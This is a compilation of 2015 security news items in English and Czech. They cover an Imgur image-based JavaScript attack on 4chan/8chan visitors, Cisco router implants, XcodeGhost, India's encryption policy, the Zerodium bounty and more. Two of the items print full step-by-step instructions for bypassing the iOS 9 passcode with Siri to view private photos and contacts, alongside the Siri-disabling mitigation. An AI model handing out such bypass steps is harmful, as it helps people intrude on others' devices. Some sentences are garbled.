Today we will speak about image boards web services that are very popular especially among youngsters, they are a sort of Internet forum that allows users to post images. Such kind of services is very popular targeting them it is possible to compromise large audience, now it has been reported that a serious vulnerability in the online image sharing community Imgur was exploited by hackers to hide malicious code in images, control visitors’ browsers, and take over the 4Chan and 8Chan image boards.

Imgur has already fixed the hole preventing the upload of malicious images, but anyway it confirmed that threat actors have used compromised pages in targeted attacks. According to Imgur, the attack is limited to these pages and not involved the site’s main gallery page.

“Yesterday a vulnerability was discovered that made it possible to inject malicious code into an image link on Imgur,” explained the Imgur community director Sarah Schaaf.
“From our team’s analysis, it appears the exploit was targeted specifically to users of 4chan and 8chan via images shared to a specific sub-reddit on using Imgur’s image hosting and sharing tools.”

“The vulnerability was patched yesterday evening and we’re no longer serving affected images, but as a precaution we recommend that you clear your browsing data, cookies, and local storage.”

4chan imgur attack

Which is the attack scenario?

The attack injected a JavaScript in the victims’ local storage that sent a ping to the attacker’s command and control servers every time the target visits 8Chan.

The images containing the malicious code were posted to 4Chan and a related Reddit subreddit page. It is not clear the intent of the attackers and according the information available the command and control servers weren’t used to send orders to the infected machines.

Reddit users report JavaScript created an off-screen iframe and embedded a flash file that ran alongside Imgur’s other Flash components making the attack less suspicious.

“This flash file injected more JavaScript into the page [which looked] like an innocuous Pikachu animation,” one Reddit user says.

“This JavaScript was stored to the user’s localstorage which, since the iframe was pointing at 8chan, allowed the attacker to attach JavaScript to 8chan’s localstorage. It’s functionality is to issue a GET request to and then decrypted the response. So far no one has been able to see a response from that web service, meaning it likely wasn’t activated yet or has already been deactivated. The outcome is that every time a user visited an 8chan page, it would phone home to check for instructions and then execute more JavaScript code.’

As reported by TheRegister, The attacks were described also on various 4Chan boards.

The security team at Imgur has implemented more controls to allow the publication only of “valid” image files and blocked any JavaScript.

As reported in the official announcement made by Imgur, users are invited to clear browsing data, cookies, and localstorage.

Problém s malwarem v routerech Cisco je mnohem závažnější

23.9.2015 Viry
Útočníci nainstalovali škodlivý firmware na nejméně dvě stovky směrovačů firmy Cisco, užívaných firmami ve více než třiceti zemích.

Tvrdí to analýza skupiny Shadowserver Foundation, zabývající se bojem proti kyberkriminalitě a sledující nekalé aktivity na internetu. Na útoky upozornila minulé úterý Mandiant, dceřiná společnost firmy FireEye, s tím, že útočníci nahradili firmware na routerech ISR společnosti Cisco Systems.

Tato modifikace jim poté umožňuje trvalý přístup takzvanými zadními vrátky do systému a dává možnost instalovat do něj malwarové moduly.

Ještě minulý týden mělo být takto napadených routerů čtrnáct, ve čtyřech zemích – v Mexiku, na Ukrajině, v Indii a na Filipínách, přičemž se jednalo o modely Cisco 1841, 2811 a 3825, jež se ale dnes už neprodávají.

Cisco proto ve spolupráci s dobrovolníky ze Shadowserver provedlo scan, který měl odhalit další potenciálně napadená zařízení. A podezření se potvrdila.

Routerů napadených skrze zadní vrátka malwarovou modifikací nazvanou SYNful Knock bylo daleko víc než čtrnáct. Scan nalezl dalších 199 unikátních IP adres v 31 zemích, které vykazovaly známky napadení. Nejvíc – 65 – jich je z USA, 12 z Indie a 11 z Ruska.

„Je důležité upozornit na závažnost tohoto problému. Odhalení a opravení napadených routerů by mělo být top prioritou,“ uvádí Shadowserver ve své zprávě s tím, že dotčené provozovatele bude o výsledcích svých zjištění brzy postupně informovat.

Ovládnutím routerů totiž útočníci získají přístup a možnost upravování síťového provozu a mohou tak uživatele přesměrovávat na požadované webové stránky anebo páchat další škody na zařízeních v rámci lokální sítě, která by byla z internetu jinak nepřístupná.

A jelikož zařízení, na která autoři SYNful Knock útočí, jsou zpravidla profesionální routery užívané firmami nebo poskytovateli internetového připojení, dopad útoku může pocítit značné množství uživatelů.

AVG to řeklo na rovinu: co o vás zjistí, to také zpeněží

23.9.2015 Sledování

Otevřenost v podmínkách užívání, výzva ostatním ke stejnému přístupu a zkrácení těchto textů. Nu což, dobrý PR počin.
AVG nejprve trochu popíchlo ostatní firmy prohlášením, že je čas na krátké a srozumitelné Podmínky užívání (ale i Podmínky ochrany soukromí). Což je velmi dobrá připomínka, protože ty desítky stránek od Microsoftu či Facebooku už dávno nikdo nedokáže přečíst celé, natož pochopit a řídit se podle nich. Nehledě na to, že jejich součástí je i běžné kličkování a vynechávání podstatných detailů.

U AVG to vzali od podlahy a v nových podmínkách (budou platit od 15. října) to řekli na rovinu. V části o shromažďování informací o uživatelích upozorňují, že budou sbírat IP adresy, uživatelské data, data o účtech, telefonní čísla, údaje o SIM kartě, IMEI, MEID či geolokační informace. A že, pokud to není nutné zachovat, je anonymizují.

Ale také to, že shromažďují řadu dalších informací, z nichž některé slouží k onomu klasickému „zlepšování produktů a služeb“. Ale co je dost revoluční, přímo uvádějí, že některá data shromažďují proto, že na nich vydělávají peníze – což se přímo týká inzertního identifikátoru, historie prohlížeče a vyhledávání (včetně metadat), informací o tom, odkud a jak se připojujete, a informací o aplikacích, které máte na zařízení nainstalované, a toho, jak je používáte.

Zdaleka to ale není všechno, AVG v další části Podmínek jasně říká, že může sdílet neosobní data s třetími stranami, stejně jako to, že může veřejně zobrazovat agregované nebo anonymní informace. Osobní data sice nesdílejí, ale pochopitelně je mohou poskytnout dalším společnostem spojeným s AVG. A týká se to samozřejmě také platebních informací, zákonem daných požadavků, ale také okamžiků, kdy je potřeba chránit práva či vlastnictví AVG.

Krátké podmínky se nakonec moc nepovedly

Nové Podmínky nakonec zrovna krátké nejsou, mají sedm autorských stránek, ale jsou vcelku kratší, než totožné podmínky u řady jiných společností. Poměrně jasně přiznávají to, co beztak dělají všichni. A také poměrně jasně říkají, že za vším je vhodné hledat peníze, a pokud dojde na lámání chleba, tak žádné ohledy na uživatele nikdo brát nebude.

Zveřejnění nových podmínek vyvolalo bouřlivé reakce uživatelů (viz třeba Reddit a AVG anti virus just updated there privacy policy. it says that they can and will sell your browsing history to 3rd parties), kteří se většinou pohoršují obecně, ale v některých případech upozorňují na některé zásadnější věci.

Jako třeba to, že AVG ochotně využije informace o tom, kde se pohybujete na internetu, a s jejich poměrně osobním charakterem si moc hlavu nedělá. Na druhou stranu, uživatelé historii prohlížeče ochotně svěřují pochybným add-onům pro prohlížeč, kvůli kterým je pak mohou zneužívat viry, adware i malware.

Dobrá pointa kritiků nových Pravidel je i ta, že AVG velmi výrazně rozšiřuje to, co považuje za „neosobní“ data. Hlavně ale to, že jakkoliv určitý jeden údaj nemusí být osobní, ve spojení s dalšími se osobním může stát. Nutno ale podotknout, že AVG opravdu v zásadě pouze „skoro“ poctivě popisuje to, co dělají všichni ostatní (a nijak zvlášť to raději nepopisují).

Co k tomu všemu dodat? Máte možnost volby, nemusíte AVG používat (a nemůžete se AVG a antiviru zdarma vlastně ani moc divit, že potřebuje nějak vydělávat) a zkusit jiný antivirus. Po pečlivém přečtení jejich Podmínek užívání a Podmínek ochrany soukromí je ale dost pravděpodobné, že v nich buď najdete v zásadě to samé (napsané trochu jinak), nebo, což je daleko pravděpodobnější, vám „zapomenou“ říci, co vlastně dělají. Protože přeci to, co o vás ví, slouží k „zlepšení služeb a produktů“ a o dalším využití se stejně nemáte šanci dozvědět.


23.9.2015 Zabezpečení

Internet směřuje k šifrování. To je dobrá zpráva, která přichází jako reakce na vlnu odposlechů, šmírování a přibývajících útoků. Technicky je vše dobře připraveno, servery i klientský software umí potřebné protokoly i šifrovací algoritmy. Jediným problémem tak zůstává dostupnost důvěryhodných certifikátů, které doposud bylo třeba platit, ověřovat a hlídat jejich platnost.

To byl důvod, proč správci často na podporu HTTPS rezignovali. Byť existovaly způsoby, jak získat certifikát velmi levně nebo dokonce zdarma, za tu práci jim to nestálo. Všechny výše zmíněné problémy by měly v listopadu zmizet spolu s příchodem certifikační autority Let's Encrypt, která nabídne důvěryhodné certifikáty všem, zdarma a s minimem konfigurace.

Padne tak poslední překážka v nasazování HTTPS a to by se mělo stávat čím dál větším standardem i na menších webech. Ty velké celosvětové už ho za samozřejmost považují. Nastal čas, abyste ho za samozřejmost začali považovat i vy a zelený zámeček se rozšířil i do těch nejzapadlejších koutů webu. HTTPS by mělo být všude.

Redakční poznámka: doposud podporu HTTPS nemá a věřte, že kdyby to záleželo jen na redakci, má ji deset let. Ovšem ledy se hnuly a měli bychom se dočkat již velmi brzy.

Nezměněný obsah

Jen díky plnému end-to-end šifrování si můžete být jisti, že nikdo po cestě nezmanipuloval obsah, na který se díváte. Existuje celá řada způsobů, jak toho dosáhnout, stejně jako důvodů. Může jít o vyloženě zlé úmysly, ale třeba i jen o úpravu výhodnou pro provozovatele místní sítě.

Existují například hotspoty s „free internetem“, které do prohlížených webových stránek vkládají vlastní měřicí kódy nebo dokonce reklamy. Bez šifrování si nemůžete být nikdy jisti, že něco nebylo přidáno, upraveno či odstraněno.

Rovněž různé proxy servery na cestě mohou provádět zásahy, o které nemáte zájem, nebo mohou logovat konkrétní části provozu. Nad nešifrovanými daty nemáte naprosto žádnou kontrolu. Jedině správně nasazené HTTPS vám zaručí, že data prošla bez změny od startu až k cíli.

Bezpečná identita

Mnoho webů je dnes vázáno na identitu uživatele, k mnoha službám se běžně přihlašujeme. Je proto velmi rozumné, aby přihlašovací údaje neputovaly otevřeným internetem. Kdokoliv by je mohl odposlechnout a zneužít. Při dnešním rozšíření různých hotspotů a běžném užívání notebooků, tabletů a mobilů je velmi snadné jednoduše sedět v kavárně a „poslouchat“ cvrkot okolo. Dokonce na to existují velmi pohodlné nástroje, které dokáže ovládat kdokoliv.

Ovšem i když údaje neputují v otevřené variantě a používá se nějaký druh challenge response přihlašování, později je k identifikaci uživatele používána už jen uložená cookie, která může být opět triviálně odchycena a celé sezení může být uživateli uneseno pod rukama. V dnešní době mobility už nikdo kontrolu podle IP adresy nepoužívá. Je zkrátka příliš nepohodlné se pořád přihlašovat.

Prokazování identity se ale týká i serverů samotných. V nedávné době se začalo přibývat útoků na domácí routery, ve kterých útočník změní nastavení DNS a z vlastních rekurzivních serverů pak začne servírovat vlastní odpovědi. Je pak schopen zmanipulovat počítač oběti tak, že místo pravých webů začne navštěvovat jejich falešné phishingové kopie.

Uživatel pak vlastně vůbec na svém počítači nemá šanci zjistit, že je něco špatně. Útočník mu klidně podvrhne falešnou stránku, nechá ho přihlásit a získá jméno i heslo. Co ovšem nedokáže, je zkopírovat z původních stránek privátní klíč patřící k platnému certifikátu. Jinými slovy při požadavku na HTTPS verzi webu jste v bezpečí a dokážete snadno rozpoznat, že druhá strana je skutečně tím, s kým si přejete komunikovat.

Přecitlivělost na citlivost

Dokud nenasadíme šifrování všude, budeme muset řešit otázku, která data jsou pro uživatele citlivá a která ještě ne. Je tahle akce ještě veřejnou záležitostí nebo už uživatel překročil hranici a měl by být chráněn. Dokud jen čte, může být na HTTP, jakmile začne psát, musíme začít šifrovat?

„Nevkládejte citlivé informace do naší stránky, není bezpečná proti odposlechu.“ Takový nápis by měl stát na mnoha webech, které se necitelně rozhodnou být vhodné jen pro necitlivé informace. Proč to ale vlastně máme rozlišovat a rozhodovat o kvalitě dat?

Když zavedeme šifrování všude, přestaneme tuto otázku řešit. Jednoduše přestaneme data dělit na citlivá a běžná a budeme mít prostě data. Nastavíme vysoký standard týkající se dat jako takových, citlivost pak můžeme ponechat na uživateli, protože jen ten ví, která data může zveřejňovat a která ne.

Rostoucí důvěra

Pokud začneme šifrování považovat za standard, začne se mu věnovat více pozornosti a uživatelé jej začnou brát jako standard. Prohlížeče budou moci otočit svou logiku a místo zdůrazňování HTTPS na některých webech budou zdůrazňovat nešifrované spojení na několika málo zbývajících. Šifrované spojení se tak stane „tím normálním“.

To opět zvýší důvěru uživatelů a posílí celé šifrované prostředí. Pokud začneme šifrovat i „méně důležitá“ data, pomůžeme tím i těm „důležitějším“. Nešifrovaný obsah tak bude postupně čím dál více vytlačován na okraj sítě a útočníkům se nevyplatí zaměřovat se na malou hrstku uživatelů, kteří budou okrajové weby používat.

Vyšší rychlost

Šifrování webu má také pozitivní dopad na rychlost jeho načítání. Moderní prohlížeče totiž podporují protokol SPDY a z něj vycházející HTTP/2, dovolují ale jejich použití pouze zároveň s HTTPS. Pokud je nový protokol použit, mohou být k přenosu použity takzvané proudy, které dovolují paralelně vyřizovat několik požadavků zároveň. Detailně to v článku Jak funguje nový protokol HTTP/2 popisuje Pavel Satrapa.

Reálně je možné zrychlit načítání webu o desítky procent, jak si můžete sami vyzkoušet na webu Web načítá 360 různých objektů (v tomto případě obrázků) a měří, jak si povede šifrovaná a nešifrovaná varianta.

Zrychlení o více než 50 %.
Zda konkrétní server podporuje SPDY, zjistíte na webu

HTTPS je budoucnost současnost

Internet jednoznačně směřuje k šifrování. Velké společnosti spolu s internetovou komunitou dělá vše proto, aby se stalo standardem, který máme nejen očekávat, ale i vyžadovat. Není to žádná budoucnost, už teď se to děje, velké organizace už vydaly doporučení a nastavily loď správným směrem.

IETF v RFC7258 říká, že všudypřítomné sledování je útokem samo o sobě a že nové protokoly by měly šifrování považovat za výchozí stav. W3C říká, že web by měl aktivně upřednostňovat šifrované spojení. Google zvýhodňuje šifrované weby. Tvůrci webových prohlížečů se už snaží prosadit upozorňování na nezašifrovaný web.

Cílem celé internetové komunity je udělat ze šifrování standard. Výsledkem bude levnější, rychlejší a jednodušší nasazení pro všechny. Iniciativa Let's Encrypt je jen první velkou vlaštovkou, věřte, že přijdou další. Dojde ke změně software, dokumentace a služeb tak, aby bylo nasazení šifrování velmi snadné a nakonec aby nevyžadovalo vůbec žádné úsilí. Pak HTTP zmizí stejně, jako kdysi zmizel telnet.

Access Private Photos and Contacts Without a Passcode on iOS 9 devices

A hacker has found a way to access images and contacts stored on Apple iOS 9 devices even if they are protected with a passcode or Touch ID.
A few hours ago I have posted the news on the decision of the Security firm Zerodium to pay a 1 Million Dollars prize for zero-day exploits and jailbreak for the newborn iOS 9.

Now I discover that it is quite easy to access user’s personal photos and contact list stored in the iOs devices running iOS 9. According to colleagues at THEHACKERNEWS, a hacker has found a method to access private data even if the mobile device is protected with a passcode or Touch ID.

The hacker explained that using the Apple’s personal assistant Siri it is possible to access data on the mobile device running iOS 9 less than 30 seconds.

ios 9

Below the detailed instructions to bypass the passcode:
Take the Apple device running the iOS 9 and enter an incorrect passcode four times.
Depending on the length of your passcode, for the fifth attempt enter 3 or 5 digits and for the last one, press and hold the Home button to run Siri immediately followed by the 4th digit.
Once Siri appears, ask the assistant for the time.
Tap the Clock icon to open the Clock app, and add a new Clock, then write anything in the Choose a City field.
Now double tap on the word you wrote to invoke the copy & paste menu, Select All and then click on “Share”.
Tap the ‘Message’ icon in the Share Sheet, and again type something random, hit Return and double tap on the contact name on the top.
Select “Create New Contact,” and Tap on “Add Photo” and then on “Choose Photo”.
At this point, you’ll now be able to access the entire photo library on the iOS device, which is still locked with a passcode. Now browse and view any photo from the Photo album individually.
Below the video proof of concept for the trick.

Despite such kind of hack doesn’t match the “Eligibility / Conditions” announced by Zerodium, it is interesting to note that is quite easy to bypass the basic security measures implemented by the IT giant for its new born iOS 9

Waiting for a patch, iOS users can disable Siri on the lock screen by modifying the settings of the device from

Settings > Touch ID & Passcode
Once disabled, users will be anyway able to continue using Siri after unlocked their iOS 9 based device.

My Government Doesn't Understand How Encryption and Cyber Security Work

Almost every day or every second day, When I come across various announcements in Newspaper, TV News Channels, and Press releases that...
...Indian Government and related Policy-making organizations are going to set up their so-called "CyberSecurity Task Forces" or drafted a "National Cyber Security Policies," with an aim to boost cyber security in India…
The first thing that comes to my mind is:
Why Doesn't my Government Understand How Encryption and Online Cyber Security Works?
Yes, My Government really have no idea, How Encryption relates to users' Privacy. And… Narendra Modi's Government has done it again!
With the release of the draft National Encryption Policy, the government wants access to all your messages whether sent over online email services like Gmail or messaging services like WhatsApp, Viber, or Messenger.
The National Encryption Policy (before addendum) required:
Access to your Private Data
To store your digital messages or Emails for 90 Days in Plaintext
Share your Encryption Keys with Government
Foreign Services Providers to Comply with Indian Government
Yes, besides Indian Service Providers, the draft policy forces Service Providers outside of India to sign an agreement under which the Indian government will prescribe the Encryption algorithms and key sizes.
So, DeitY expects thousands of Foreign Service Providers that encrypt its users' data to put the government backdoors into their secure software — similar to what the NSA did for spying on US citizens.
DeitY believes that this would enhance cyber security in India. Oh! Really? Looks like the experts have got it all wrong.
Policy Triggered National Outrage (Addend Policy)
However, after massive public outcry, the government has withdrawn the draft proposal and issued an addendum to the National Encryption Policy which says:
You will need to keep records of emails from Gmail and other email services, and have to submit them to Security agencies if required.
All Service Providers located within and outside India using Encryption technology for offering any services in India will need to register their services with the Government.
The Mass Use Encryption products, such as social media websites (Twitter and Facebook) and social media applications (WhatsApp, Viber, and Line), would not be regulated by the new National Encryption Policy.
SSL/TLS encryption products being used by Banking, e-commerce websites and Payment gateways will also be exempted.
The proposed National Encryption Policy would apply to everyone including government departments, academic institutions as well as citizens, and for all kind of communications…
...suggesting legal action that also includes Imprisonment, if violated.
Earlier and even the latest version of the ‘National Encryption Policy’ has raised several privacy concerns.
It seems like the Indian government has once again proven itself to be zero in knowledge about the issues related to Privacy and Online Security.
At The Hacker News, our agenda is to educate the world for Cyber Security. However, in the country from…
…where The Hacker News operates, where our own government is releasing such policies in the name of cybersecurity, we feel like a Failure, for which We Really Apologize!
Any updates on the topic will be added to the article to keep you informed.

Deleting WhatsApp Messages Before 90 Days Could Land you in Jail

While the Indian people continue to struggle for Net Neutrality, a new problem surrounded them with the release of the latest policy for ‘National Encryption Policy’ by the Indian Government.
If you delete your WhatsApp Messages or Emails that you receive or send before 90 days, it might be a crime and you can End-up In Jail.
If the new National Encryption Policy implements that come up with weird suggestions — one should not delete WhatsApp conversation, Gmail or any email for 90 days, it would be an Internet Disaster.
With the aim to ‘provide confidentiality of information’ and ensure ‘protection of sensitive or proprietary information’, the draft policy, proposed by an so-called ‘expert panel’ from the Department of Electronics and Information Technology (DeitY), requires:
Access to your Private Data
The government wants to have access to all your encrypted information including your personal emails, text and voice messages, and data stored in a private business server.
Not to Delete any WhatsApp Messages or Emails for 90 Days
The Policy will enforce Internet users to save all encrypted communication data in plaintext for at least 90 days, which includes: WhatsApp messages, emails, sensitive banking or e-commerce transactions details.
Share your Encryption Keys with Government
National Encryption Policy also want Indian Internet Users to give up their encryption keys to the Government and Security Agencies.
Foreign Services Providers need to Comply with Indian Government
In India, More than 80% of Internet users are addicted to Non-Indian services like WhatsApp, Facebook, Gmail, Skype, Telegram and thousands more.
But, the National Encryption Policy requires Service Providers located outside India to enter into an agreement with the Indian Government, which says:
“Encryption algorithms and key sizes will be prescribed by the Government,” the policy reads.
You can send your comments to by October 16, 2015.
The draft National Encryption policy has triggered national outrage among citizens of India that are forced to store their online messages send through WhatsApp, SMS, e-mail or any such service for up to 90 days.
Now Let’s see what the government decides.

iOS 9 Hack: How to Access Private Photos and Contacts Without a Passcode

Setting a passcode on your iPhone is the first line of defense to help prevent other people from accessing your device.
However, it's pretty easy for anyone to access your personal photographs and contacts from your iPhone running iOS 9 in just 30 seconds or less, even with a passcode and/or Touch ID enabled.
Just yesterday, the Security firm Zerodium announced a Huge Bug Bounty of 1 Million Dollars for finding out zero-day exploits and jailbreak for iPhones and iPads running iOS 9. Now...
A hacker has found a new and quite simple method of bypassing the security of a locked iOS device (iPhone, iPad or iPod touch) running Apple's latest iOS 9 operating system that could allow you to access the device's photos and contacts in 30 seconds or less.
Yes, the passcode on any iOS device running iOS 9.0 is possible to bypass using the benevolent nature of Apple’s personal assistant Siri.
Here's the List of Steps to Bypass Passcode:
You need to follow these simple steps to bypass passcode on any iOS device running iOS 9.0:
Wake the iOS device and Enter an incorrect passcode four times.
For the fifth time, Enter 3 or 5 digits (depending on how long your passcode is), and for the last one, press and hold the Home button to invoke Siri immediately followed by the 4th digit.
After Siri appears, ask her for the time.
Tap the Clock icon to open the Clock app, and add a new Clock, then write anything in the Choose a City field.
Now double tap on the word you wrote to invoke the copy & paste menu, Select All and then click on "Share".
Tap the 'Message' icon in the Share Sheet, and again type something random, hit Return and double tap on the contact name on the top.
Select "Create New Contact," and Tap on "Add Photo" and then on "Choose Photo".
You'll now be able to see the entire photo library on the iOS device, which is still locked with a passcode. Now browse and view any photo from the Photo album individually.
Video Demonstration
You can also watch a video demonstration (given below) that shows the whole hack in action.

It isn't a remote flaw you need to worry about, as this only works if someone has access to your iPhone or iOS device. However, such an easy way to bypass any locked iOS device could put users personal data at risk.
How to Prevent iOS 9 Hack
Until Apple fixes this issue, iOS users can protect themselves by disabling Siri on the lock screen from Settings > Touch ID & Passcode. Once disabled, you’ll only be able to use Siri after you have unlocked your iOS device using the passcode or your fingerprint.

WIN $1 Million Bounty For Hacking the New iOS 9 iPhone

Good news for Hackers and Bug hunters!
You can now WIN 1 Million Dollars for finding zero-day hacks for iPhones and iPads.
Yes, $1,000,000.00 Reward
This Huge Bug Bounty is offered by the new Security firm Zerodium, a startup of the infamous French-based Security firm "VUPEN", who is well known for buying and selling zero-day vulnerabilities.
Zerodium, which describes itself as "the premium zero-day acquisition platform," announced a total of $3 Million ($3,000,000) bounty bounty rewards for iOS exploits and jailbreaks.
$3 Million Reward for Zero-day exploits and Jailbreaks
The Zero-day Acquisition Firm challenges hackers, researchers, and bug hunters to discover zero-day flaws and exploits in Apple's latest mobile operating system iOS 9 that must allow an attacker to remotely compromise a non-jailbroken iOS device through:
A web page,
In-app browsing action, or
text message or MMS (Multi-Media Messages)
"The whole exploitation [or] jailbreak process should be achievable remotely, silently, reliably, and without requiring any user interaction except visiting a webpage or reading an SMS [or] MMS," Zerodium says in a blog post.
However, the vulnerabilities in Airdrop, Bluetooth, NFC, or baseband would not qualify.
Also Read: For Better Privacy & Security, Change these iOS 9 Settings Immediately.
The firm is also offering a Million dollar bounty for finding untethered jailbreak for iOS 9 that must work on:
iPhone 6S
iPhone 6S Plus
iPad Air 2 and others
The bug bounty program is valid and open until October 31st, 2015 at 6:00 p.m. EDT, and or until the firm ends up paying the total promised payout of $3 Million to researchers and developers.

Adobe fixes dozens critical vulnerabilities in Flash Player

Adobe has released a new Flash Player update that patches 23 critical vulnerabilities in the popular software. Update your version asap.
Adobe has released a new Flash Player update that fixes 23 critical vulnerabilities in the popular software.

According to the security bulletin issued by Adobe, Version and earlier of the Flash Player for Windows and Mac, Microsoft Edge and Internet Explorer 11 in Windows 10, and Internet Explorer 10 and 11, are affected by the flaws that in some cases can be exploited by attackers for remote code execution.

As reported by Adobe, 18 of the 23 vulnerabilities in the Adobe Flash Player could lead to code execution. Attackers can exploit remaining vulnerabilities to bypass the same-origin-policy and some of them could result in information disclosure and memory leakage.

Adobe is urging its users to update their software for the last release, version, users can download it from the Adobe official website, or via automatic update.

adobe-flash-patch-CVE-2014-8439 Flash Player

In some cases, Adobe provided the software update to add additional validation checks in order to make its Flash Player resilient to cyber attacks. This is the case of supplementary checks that have been added to reject malicious content from callback APIs.

Most of the flaws fixed with this last update are credited to Google Project Zero team, to the Chinese hacking group Keen Team, to Tencent’s Xuanwu Lab, and to security experts at Alibaba Security Research Team.

Overall in the last two months, Adobe had fixed Already blackberries than fifty security vulnerabilities, Last month Adobe released a security update to fix more than 30 flaws .

At the time I was writing, Adobe confirmed that it is not aware of any exploits triggering the flaw in the wild, but don’t waste your time, update your version to the latest one.

Warning! Popular Apple Store Apps Infected with Data-Theft Malware

Unlike Google Play Store, Apple App Store is well known for not allowing any malformed apps to enter its Apple ecosystem because of its tight security checks.
But, not anymore.
Hundreds of malicious apps managed to get hosted on Apple's official App store and subsequently downloaded by several hundred Million iPad and iPhone owners. Out of them, Palo Alto Networks published a list of 39 malicious yet legitimate apps that made ways to the App Store.
First Major Malware Attack on Apple's App Store
Yes, Apple App Store is targeted by a malware attack in which some versions of software used by software developers to build their apps for iOS and OS X were infected with malware, named XcodeGhost.
XcodeGhost secretly sniffs off data from customer's device and uploads it to the attacker's servers without the user's knowledge, according to security firm Palo Alto Networks.
Apps were infected after developers used a malicious version of the Xcode — Apple's developer toolkit used to develop iOS and Mac OS X apps.
Xcode is downloaded directly from Apple for free as well as from other sources such as developer forums. Chinese file-sharing service Baidu Yunpan offers some versions of Xcode that contains extra lines of code.
These malicious variants of Xcode have been dubbed as XcodeGhost by AliBaba researchers.
Affected Applications
A total of 39 apps, including the popular instant messaging app WeChat, Chinese Uber-like cab service Didi Kuaidi, music streaming service NetEase, photo editor Perfect365 and card scanning tool CamCard, were found to be infected by the malicious Xcode.
Not just China, Apple users outside China are also affected by the malware. The mainstay WinZip decompression app,, and the Mercury Browser are also among the affected apps.
The Imapct Of XcodeGhost?
Once installed, the malicious app contains dangerous XcodeGhost code prompt fake alerts to:
Phish user credentials
Hijack URLs
Read and Write data, such as victims' iCloud passwords
Infect other apps using iOS
Researchers believe XcodeGhost is a very harmful and dangerous piece of malware that successfully bypassed Apple's code review as well as made "unprecedented attacks on the iOS ecosystem."
The technique used in the malware attack could be exploited by cyber criminals and espionage groups in order to gain access to victims' iOS devices.
Apple has removed more than 300 malware-infected apps from its App Store after a counterfeit version of its developer tool kit allowed many Chinese apps to leak users' personal data to hackers.
"We've removed the apps from the app store that we know have been created with this counterfeit software," Apple spokesperson Christine Monaghan told Guardian. "We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps."

Apple removes hundreds of malicious apps after major malware attack

Apple has removed more than 300 malware-infected apps after confirming the first major breach to its iOS app store, reports The Guardian.
The company confirmed on Sunday that it was cleaning up the store after finding a malicious program, dubbed XcodeGhost, was embedded into hundreds of legitimate apps.
The malicious code was concealed in a counterfeit version of Xcode – Apple’s software for creating apps – which the attackers had somehow convinced developers to use. Users who downloaded these apps were then left exposed, leaking personal information back to the attackers.
“We’ve removed the apps from the App Store that we know have been created with this counterfeit software,” Apple spokeswoman Christine Monaghan told Reuters. “We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps.”
Many of the infected apps are said to be aimed at Chinese markets, most notably popular WhatsApp competitor WeChat. The developer said it has already patched the flaw, which would only affect users on version 6.2.5.
“A preliminary investigation into the flaw has revealed that there has been no theft and leakage of users’ information or money,” said a post on the WeChat blog, adding that its team will continue to closely monitor the situation.
The attack on the iOS app store is a warning for Apple, which has a good record of weeding out malicious apps through its stringent review process.
Earlier this year we reported on malicious apps detected on Android’s Google Play store, potentially harvesting the Facebook credentials of as many as 1,000,000 people.
More than ever, then, smartphone users are encouraged to update all apps to the latest versions, while always being careful of the software they download to their devices.
If you’re unsure of what to look for when downloading apps, then remember the tell-tale signs highlighted in our video below.

Zerodium Hosts Million-Dollar iOS 9 Bug Bounty

Exploit vendor Zerodium, a company started by VUPEN founder Chaouki Bekrar, today announced it will host a month-long million-dollar bug bounty focused on Apple iOS 9.

Bekrar said in a statement there is a $3 million pool available for the bounty, which will close on Oct. 31 or earlier if the total payout to researchers reaches the $3 million mark.

“Zerodium will pay out one million U.S. dollars to each individual or team who creates and submits to Zerodium an exclusive, browser-based, and untethered jailbreak for the latest Apple iOS 9 operating system and devices,” Bekrar said.

To be eligible, submissions must include a chain of unknown, unpublished and unreported vulnerabilities and exploits that is able to bypass the numerous mitigations native to iOS 9, including ASLR, code signing and bootchain.

“The exploit/jailbreak must lead to and allow a remote, privileged, and persistent installation of an arbitrary app (e.g. Cydia) on a fully updated iOS 9 device,” the statement said. Attacks must begin, the conditions say, via a webpage targeting mobile versions of Safari or Chrome, or any application reachable through the browser. Attacks can also initiate via text messages or multimedia files sent over SMS or MMS.

“The whole exploitation/jailbreak process should be achievable remotely, reliably, silently, and without requiring any user interaction except visiting a web page or reading a SMS/MMS,” Zerodium said.

Attacks that require physical access, or are carried out over Bluetooth, NFC or baseband are not eligible, the company said, adding that the only devices in scope are iPhone 5 and later, and iPad Air, Air 2, third-and fourth-generation iPads, and iPad mini 2 and 4.

Zerodium launched in late July with a focus on buying high-risk zero-day vulnerabilities only, and for all major platforms and third-party applications such as Adobe products. Mobile platforms, including Android, BlackBerry and Windows Phone in addition to iOS, are also in scope for Zerodium as are the major web and email servers. The attacks it purchases will be built into a feed of vulnerabilities, exploits and defensive capabilities for its customers.

“Zerodium does not acquire theoretically exploitable or non-exploitable vulnerabilities. We only acquire zero-day vulnerabilities with a fully functional exploit whether including only one stage or multiple stages e.g. browser exploits with or without a sandbox bypass/escape are both eligible,” the company says.

A host of exploit vendors operate in this controversial market of finding and buying bugs from researchers, and selling them. Ironically, VUPEN has shied away from buying vulnerabilities, and Bekrar has said many times that his company sells only to democratic, non-sanctioned governments. Since this year’s breach of Italy’s HackingTeam exposed almost all of the company’s secrets, it was confirmed that not all of the vendors operating in this space follow the same creed.

HackingTeam, for one, was atop that list after documents stolen in the breach and published online showed that the surveillance software vendor was selling to the governments of Sudan, Egypt and Ethiopia, all considered oppressive regimes and under European Union sanctions. HackingTeam’s Remote Control System software is marketed to law enforcement and intelligence agencies as a tool to remotely compromise computers and mobile devices in order to monitor communication. This activity has been called on the carpet not only by security researchers but also by human rights groups.

New attacks on critical communications infrastructure in the US

Unknown attackers continue to target critical communications infrastructure in the US, on Monday they cut backbone fiber optic Internet cables in California.

Someone continues to target critical communications infrastructure in a region of the U.S., on Monday, September 14, unknown attackers cut backbone fiber optic Internet cables in Livermore California. This is not an isolated attack, law enforcement counted fourteenth attacks on critical communications infrastructure in the same region and security experts suspect that the attackers are carrying our the sabotage for economic and cyber warfare.

“These cuts affected multiple companies causing outages in some of the Bay area and stretched up into the Sacramento area,” said FBI Special Agent Greg Wuthrich in an email.

The investigation on such kind of attacks is conducted by the FBI because AT&T’s fiber optic network is considered to be part of the nation’s critical communication infrastructure.

“Someone deliberately severed two AT&T fiber optic cables in the Livermore, Calif., Monday night, the latest in a string of attacks against the Internet’s privately run backbone.” reported the USA Today website adding that AT&T is offering a 250,000 dollar reward for information on the attack.

Due to the attack to the communications infrastructure, Internet and phone services in Sacramento, California, were interrupted for twenty hours.

Who is behind the attacks?

